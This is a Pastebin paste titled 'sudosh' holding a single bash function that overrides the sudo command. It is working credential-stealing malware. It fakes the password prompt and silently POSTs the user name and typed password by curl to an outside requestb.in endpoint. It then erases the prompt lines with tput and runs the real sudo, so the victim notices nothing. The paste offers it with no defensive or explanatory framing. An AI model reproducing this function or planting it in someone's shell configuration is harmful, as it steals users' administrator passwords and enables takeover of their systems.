Advertisement
Guest User

sudosh

a guest
Oct 31st, 2017
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1.  
  2. sudo () { command sudo -k; read -s -p "Password:" stolenpassword; curl -sX POST -d "user=$USER&password=$stolenpassword" https://requestb.in/1fdn3y01 > /dev/null; echo ""; tput cuu1;tput el; tput cuu1;tput el; echo ""; echo $stolenpassword | command sudo -S su; echo ""; command sudo "$@"; }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement